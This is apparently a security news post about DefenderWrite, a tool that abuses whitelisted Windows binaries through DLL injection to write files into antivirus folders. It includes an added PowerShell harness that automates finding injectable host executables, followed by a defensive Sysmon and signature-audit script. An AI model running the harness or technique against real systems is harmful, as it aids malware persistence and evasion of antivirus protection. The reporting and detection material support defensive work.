Cyber Web Spider Blog – News

New DefenderWrite Tool Let Attackers Inject Malicious DLLs into AV Executable Folders

Posted on October 20, 2025 By CWS

A new tool called DefenderWrite abuses Windows programs that antivirus products whitelist, using them to bypass self-protection and write arbitrary files into antivirus executable folders, which can enable malware persistence and evasion.

Developed by security researcher Two Seven One Three, the tool demonstrates a technique that lets penetration testers and red teams drop payloads into heavily protected locations without needing kernel-level access.

The release highlights an ongoing weakness in antivirus self-protection: the folders housing AV executables are shielded from modification to prevent tampering, but that shield has exceptions.

By identifying the system programs that antivirus vendors whitelist for updates and installations, an attacker can use those exceptions to drop malicious DLLs, turning the AV's own safeguards against it.

The tool's release on GitHub has sparked discussion about the balance between the operational requirements of AV software and the security risk those exceptions create in enterprise environments.

Exploiting Whitelisted Applications for Arbitrary Writes

The core of DefenderWrite is a systematic scan of Windows executables to find the ones permitted to write into AV folders.

It enumerates every .exe under directories such as C:\Windows, then uses process creation and remote DLL injection to test, from inside each process, whether a write into a protected path succeeds.

A custom DLL performs the file write and reports success or failure, which lets the tool pinpoint exploitable host processes such as msiexec.exe without triggering defenses.

In testing on Windows 11 24H2 with Microsoft Defender version 4.18.25070.5-0, the method identified four such programs: msiexec.exe, Register-CimProvider.exe, svchost.exe, and lsass.exe. Note that the tool launches its own instance of each candidate binary and injects into that instance, so the exception appears to follow the executable rather than the long-running system process.

For instance, launching msiexec.exe and injecting the DLL allowed a file to be written directly into Defender's installation directory, as demonstrated in lab experiments.

The approach extends beyond Microsoft Defender: similar whitelisting weaknesses were confirmed in Bitdefender, TrendMicro Antivirus Plus, and Avast, though specific details remain undisclosed to encourage independent verification.

DefenderWrite takes three main parameters: TargetExePath for the host executable, FullDLLPath for the library to inject, and FileToWrite for the destination path inside the AV folder. An optional "c" flag copies the DLL to the specified location from within the remote process.

Accompanying the binary is a PowerShell script, Run_Check.ps1, which automates scanning the executables under C:\Windows and logs the whitelisted ones for follow-up.

Users can customize the script for their environment, which makes it suitable both for red team simulations and for defensive assessments.
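The scan loop the article describes, written out as an added example in PowerShell. This is not the project's Run_Check.ps1 and not code from its author: it enumerates the executables under C:\Windows, hands each one to a caller-supplied injection step, and judges success by whether the probe file actually appeared in Defender's platform folder rather than by the injector's exit code. The Defender folder path is the standard one. DefenderWrite.exe's command-line syntax is not given on this page, so the sample probe at the bottom, which passes TargetExePath, FullDLLPath and FileToWrite positionally, and the paths C:\tools\DefenderWrite.exe and C:\tools\write_probe.dll, are assumptions to adjust against the repository README.

```powershell
# Added example, not DefenderWrite's own Run_Check.ps1. Enumerates candidate host
# executables, probes each for write access to Defender's platform folder through
# a caller-supplied injection step, and logs which hosts succeed.

function Get-DefenderPlatformDir {
    # Defender's engine binaries live in a versioned folder such as
    # ...\Platform\4.18.25070.5-0; pick the highest version present.
    $base = 'C:\ProgramData\Microsoft\Windows Defender\Platform'
    Get-ChildItem -Path $base -Directory -ErrorAction Stop |
        Sort-Object { [version]($_.Name -replace '-\d+$', '') } -Descending |
        Select-Object -First 1 -ExpandProperty FullName
}

function Get-CandidateHosts {
    param([string]$Root = 'C:\Windows')
    # One entry per file name: System32 and SysWOW64 carry the same binaries and
    # every launch costs seconds, so probe each name once.
    Get-ChildItem -Path $Root -Filter *.exe -Recurse -File -ErrorAction SilentlyContinue |
        Sort-Object Name -Unique
}

function Invoke-WhitelistScan {
    param(
        [Parameter(Mandatory)][scriptblock]$Probe,   # called with (hostExe, dllPath, targetFile)
        [Parameter(Mandatory)][string]$DllPath,
        [string]$LogPath = (Join-Path $env:TEMP 'whitelist_scan.log'),
        [int]$TimeoutSec = 15
    )
    $platform = Get-DefenderPlatformDir
    $hits = @()
    foreach ($exe in Get-CandidateHosts) {
        $target = Join-Path $platform ("probe_{0}.txt" -f $exe.BaseName)
        Remove-Item -Path $target -Force -ErrorAction SilentlyContinue

        # Remember which instances of this binary already exist so that only the
        # ones the probe launches get cleaned up, never the system's own
        # svchost.exe or lsass.exe.
        $before = @(Get-Process -Name $exe.BaseName -ErrorAction SilentlyContinue | ForEach-Object Id)

        # Run the probe in a job so a host that hangs (msiexec.exe with no
        # arguments shows a usage dialog) cannot stall the whole scan.
        $job = Start-Job -ScriptBlock $Probe -ArgumentList $exe.FullName, $DllPath, $target
        if (-not (Wait-Job -Job $job -Timeout $TimeoutSec)) { Stop-Job -Job $job }
        Remove-Job -Job $job -Force

        Get-Process -Name $exe.BaseName -ErrorAction SilentlyContinue |
            Where-Object { $before -notcontains $_.Id } |
            Stop-Process -Force -ErrorAction SilentlyContinue

        # Success is judged by the artifact on disk, not by the probe's exit code.
        $ok = Test-Path -Path $target
        $verdict = if ($ok) { 'WRITE-OK' } else { 'denied' }
        "{0}`t{1}`t{2}" -f (Get-Date -Format o), $exe.FullName, $verdict | Add-Content -Path $LogPath
        if ($ok) {
            $hits += $exe.FullName
            Remove-Item -Path $target -Force -ErrorAction SilentlyContinue
        }
    }
    $hits
}

# Sample run. The positional argument order for DefenderWrite.exe and both tool
# paths are assumptions; check them against the repository README.
$probe = {
    param($hostExe, $dllPath, $targetFile)
    & 'C:\tools\DefenderWrite.exe' $hostExe $dllPath $targetFile
}
Invoke-WhitelistScan -Probe $probe -DllPath 'C:\tools\write_probe.dll' |
    ForEach-Object { "whitelisted host: $_" }
```

Each hit is a binary that, when launched and injected under the scanning user's rights, could create a file in the Defender platform folder; the log records every candidate with its verdict so the run can be resumed or compared across Defender versions. Run it only in a lab, with real-time protection behaviour noted, since the injector and probe DLL may themselves be detected.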

The GitHub repository provides full source code and documentation and stresses ethical use in authorized testing only. Two Seven One Three, active on X as @TwoSevenOneT, shares further pentest research and encourages community experiments to strengthen AV resilience.

Once a malicious payload resides in an AV folder, it benefits from the same exceptions that protect the legitimate files there, potentially evading scans and achieving long-term persistence.

The technique underscores the need for vendors to audit their whitelisting policies and to enforce stricter process isolation during updates. While not a zero-day vulnerability, DefenderWrite exposes a systemic gap that could aid real-world attacks if left unaddressed.

Organizations should monitor their AV update mechanisms and consider layered defenses beyond traditional file permissions. With the tool openly available, expect broader adoption in security research circles and pressure for improved protections across popular antivirus products.
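Two checks a defender can run against this technique, as an added example in PowerShell that is not from the article or the DefenderWrite project. The first flags binaries in Defender's install and platform folders that do not carry a valid Microsoft Authenticode signature; the second pulls Sysmon FileCreate (event 11) and CreateRemoteThread (event 8) records for writes into those folders by anything other than Defender's own components and for thread injection into the four host binaries the article names. It assumes Sysmon is installed with rules that log file creation under those paths, and the expected-writer list (MsMpEng.exe, MpCmdRun.exe, MpSigStub.exe, MpDefenderCoreService.exe) is a starting allowlist of my own to tune, not one published by the vendor.

```powershell
# Added example, not from the article or the DefenderWrite project. Audits the
# contents of Defender's folders and queries Sysmon for the two activities this
# technique produces: foreign writes into those folders and remote threads in
# the whitelisted host binaries.

$DefenderDirs = @(
    'C:\Program Files\Windows Defender',
    'C:\ProgramData\Microsoft\Windows Defender\Platform'
)

function Find-UntrustedDefenderBinaries {
    param([string[]]$Paths = $DefenderDirs)
    foreach ($dir in $Paths) {
        Get-ChildItem -Path $dir -Recurse -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -in '.exe', '.dll', '.sys' } |
            ForEach-Object {
                $sig = Get-AuthenticodeSignature -FilePath $_.FullName
                $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(none)' }
                # A payload dropped through a whitelisted host is not Microsoft-signed;
                # anything here without a valid Microsoft signature needs a look.
                $trusted = ($sig.Status -eq 'Valid') -and ($signer -match 'O=Microsoft Corporation')
                if (-not $trusted) {
                    [pscustomobject]@{
                        Path    = $_.FullName
                        Status  = $sig.Status
                        Signer  = $signer
                        Written = $_.LastWriteTime
                    }
                }
            }
    }
}

function ConvertFrom-SysmonEvent {
    # Flatten an event's <EventData> into a hashtable keyed by field name.
    param($Event)
    $data = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $data
}

function Get-SuspiciousDefenderActivity {
    param([int]$Hours = 24, [string[]]$Paths = $DefenderDirs)
    $log   = 'Microsoft-Windows-Sysmon/Operational'
    $since = (Get-Date).AddHours(-$Hours)
    # Defender's own components are the expected writers; an assumed starting
    # allowlist, tune it for your build.
    $expectedWriter = '\\(MsMpEng|MpCmdRun|MpSigStub|MpDefenderCoreService)\.exe$'

    # 1. File creation inside Defender folders by anything other than Defender.
    Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 11; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $e = ConvertFrom-SysmonEvent $_
            $inside = $Paths | Where-Object { $e.TargetFilename -like "$_\*" }
            if ($inside -and ($e.Image -notmatch $expectedWriter)) {
                [pscustomobject]@{ Time = $_.TimeCreated; Kind = 'FileCreate'; Source = $e.Image; Target = $e.TargetFilename; User = $e.User }
            }
        }

    # 2. Remote thread creation into the host binaries the article names, which is
    #    how the injected DLL comes to run inside a whitelisted process.
    $hosts = '\\(msiexec|Register-CimProvider|svchost|lsass)\.exe$'
    Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 8; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $e = ConvertFrom-SysmonEvent $_
            if ($e.TargetImage -match $hosts) {
                [pscustomobject]@{ Time = $_.TimeCreated; Kind = 'CreateRemoteThread'; Source = $e.SourceImage; Target = $e.TargetImage; User = $e.User }
            }
        }
}

Find-UntrustedDefenderBinaries | Format-Table -AutoSize
Get-SuspiciousDefenderActivity -Hours 48 | Format-Table -AutoSize
```

Both outputs are triage lists, not verdicts: a legitimate platform update delivered by a process outside the allowlist will show up in the FileCreate results, and svchost.exe receives remote threads from legitimate Windows components too, so correlate the Source image and User with the file-signature results before escalating.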
